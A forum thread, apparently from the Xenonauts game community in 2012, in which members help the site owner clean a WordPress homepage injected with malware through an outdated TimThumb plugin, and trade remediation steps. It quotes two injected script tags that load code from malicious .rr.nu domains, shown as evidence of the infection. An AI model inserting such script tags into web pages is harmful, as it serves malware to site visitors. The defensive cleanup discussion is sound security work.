Website got injected

[DrAtomic]

The Xenonauts homepage has been injected with a malicious url. Look at the parsed code and you'll find <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script> at the end of the script.

Most common causes are farmed FTP passwords or usage of opensource software that needs to be updated or usage of variables in custom code that arent checked against XSS. See http://www.acunetix.com to download a free scanner (the free scanner will highlight enough to see what needs to be fixed, clean the website first before running it though.

Edited February 23, 2012 by DrAtomic
Removed Fixed from header

[Chris]

Argh, did not need this. I'm not a web guy. Thanks for the heads up, I'll see if I can find the security hole and fix it, and get the page back up...

[Chris]

OK site appears to be restored and all major passwords are changed, plus the wordpress admin directory is changed from default. Hopefully that'll stop it happening again - but I'll have a play with Acunetix when it arrives. Thanks for the information!

[DrAtomic]

OK site appears to be restored and all major passwords are changed, plus the wordpress admin directory is changed from default. Hopefully that'll stop it happening again - but I'll have a play with Acunetix when it arrives. Thanks for the information!

You're welcome. Common cause outside of the website sources itself are farmed ftp accounts. Website wise; just be sure to be running the latest version of wordpress and also make sure to check if any plugins need updating (from your wp admin area).

[gandie]

I am still getting sent to malicious sites when visiting this website, unfortunately... (was sent to another Russian site about a minute ago).

Registered just to give a head's up

(or was it my cache? hmmm - I would advise keeping an eye out anyway).

Edited February 22, 2012 by gandie

[DrAtomic]

It got injected again... <script src="http://chelpo94landsa.rr.nu/mm.php?d=1"></script>

[Chris]

Wonderful. I've updated Wordpress to the latest version and changed my Wordpress password now too.

I don't know what else could be causing it, because there's only one FTP user with access to the domain and I changed the password on that yesterday. I hope it doesn't happen again.

[Chris]

Hmmm, even that doesn't seem to be working. I installed a heavy-duty Wordpress security plugin, hopefully that'll prevent further intrusion...

But according to http://sitecheck.sucuri.net/scanner/, I still have malicious code on the website. Anyone know a method for how I can find and remove it?

[DrAtomic]

Hmmm, even that doesn't seem to be working. I installed a heavy-duty Wordpress security plugin, hopefully that'll prevent further intrusion...

But according to http://sitecheck.sucuri.net/scanner/, I still have malicious code on the website. Anyone know a method for how I can find and remove it?

*. Check the modification date of your index.php (since it got infected again) to check what the last time of getting infected was/is.

*. Download all the webfiles to your local computer

*. Search for the string '.rr.nu' in all files

*. Clean all files that contain <script src="http://blablablablabla.rr.nu/mm.php?d=1"></script>; the string will be added to the bottom of the files, so open file, scroll to bottom, delete.

*. Check the content of your .htaccess (could contain a malicious rewrite rule) and make sure it is what it should be. If unsure or if you never modified the original then simply delete it and replace it with an original that comes with the wordpress sources. My guess is that you do use url rewrite (search engine friendly urls based

*. Run a virus scanner over the downloaded code (this will find any files that may have been uploaded that reinfest the website).

*. Make sure to run a maleware scanner on your own computer as well.

*. Once everything is clean again, reset your passwords again just to be sure.

Edited February 23, 2012 by DrAtomic

[yawa]

It might have been this vulnerability, as I see you have the Timthumb plugin:

http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/

That page is a very good writeup, and explains the possibility that they may have installed a backdoor - even if you have fixed how they got in the first time, they may have installed another way. It seems to be pretty common with Wordpress hacks to use a php based backdoor. DrAtomic's advice to run a virus scanner on the server is a good idea in my opinion. Sadly detection of php malware generally isn't as good as for exe stuff.

DrAtomic's advice sounds very good to me so I'm going to leave him to it, but I do have one question: you say you updated Wordpress, did you update all the plugins, too? I saw a very large number of exploited Wordpress sites at work today (AV industry), via some gallery plugin that lives in a directory named fgallery.

Good luck! This kind of hack is normally automated, so once you do clear out the traces they're not likely to come back.

[Chris]

Ah god dammit. I think Timthumb is integrated into the site template. I'm not sure I can disable or upgrade it.

*sigh*

Thanks for the advice guys, I'll see what I can do.

[Chris]

Right, I've closed the timthumb vulnerability (sure enough, that file was out of date so it's a potential entry point) and I'll do the virus scans etc, then change my passwords.

Fingers crossed this fixes the issue!

[MrPyro]

I'm now getting a 500 Internal Server error trying to access the page. This is probably a PHP Fatal Error, so if you have PHP error logging enabled it should give you some info in that log as to what is going on; or Wordpress might have its own logging.

[Chris]

That's intentional. I'm wiping the site and rolling it back to when I last did a backup of it.

[DrAtomic]

Sadly detection of php malware generally isn't as good as for exe stuff.

Very true, reason I said it though was to eliminate any php shells that might have been uploaded. Most of those are detected by AV software.

[Chris]

I couldn't get that to work. In the end I took the nuclear option and wiped the site, then restored a backup I took in January. I then applied all the security fixes, which should hopefully close the original vulnerabilities, and updated my passwords. It appears to have fixed the issue.

Thank god for backups, eh?

[resonansER]

I wrote to you, Chris. Let's I'll be administrator. I am easy identified by Internet. I am an adult, honest and decent admin. I know very well how to work with vBulletin and also administration unix-system

CentOs 6.x & Debian 6.x X64 - X86, and many, many, many other things.

[gsteff]

I'm still getting malware warnings from Google Chrome when I visit the news page.

[Clausewitz_]

got a malware warning @ work yesterday and 5 mins later a techy turned up in my office going yadda yadda yadda company policy yadda yadda yadda!

Are we users in any danger of being compromised - I used the link to pre-order?

cheers

[Chris]

Erk - shouldn't be...what pages gave you the malware warning, out of interest?

[RavenX]

Chris, you've been checking naughty Russian sites for mail order brides again haven't you? J/K

I've got some friends that do web security work if need be. Just say the word and can give you the name of a good company that provides site security.

[Chris]

I think I've done a pretty good job of dealing with the malware, but I'm still getting occasional reports of people encountering warnings from the site (even though I've scanned the whole thing for the problem script and found nothing).

The vulnerability only affects IE and people have mentioned encountering it on the Screenshot and Pre-Order pages so far (I've had some problems with script errors on the screenshot page when I open a screenshot).

If anyone knows anything about web security, would they mind having a look at that page to see if they can replicate the malware warnings? I can't seem to do it myself so I don't really know what to look for...

[Gorlom]

Would those users haveing cached pages cause such errors/warnings? (Just wondering I know practically nothing about all of this)

[Greven]

I am taking a look. Not sure if I will be able to find anything.

EDIT: I cannot find anything at the moment...but I will do more of a check once I am out of training and home.

Edited April 3, 2012 by Greven
Update

[Chris]

I think it's all been clear for a while now. I certainly hope it stays that way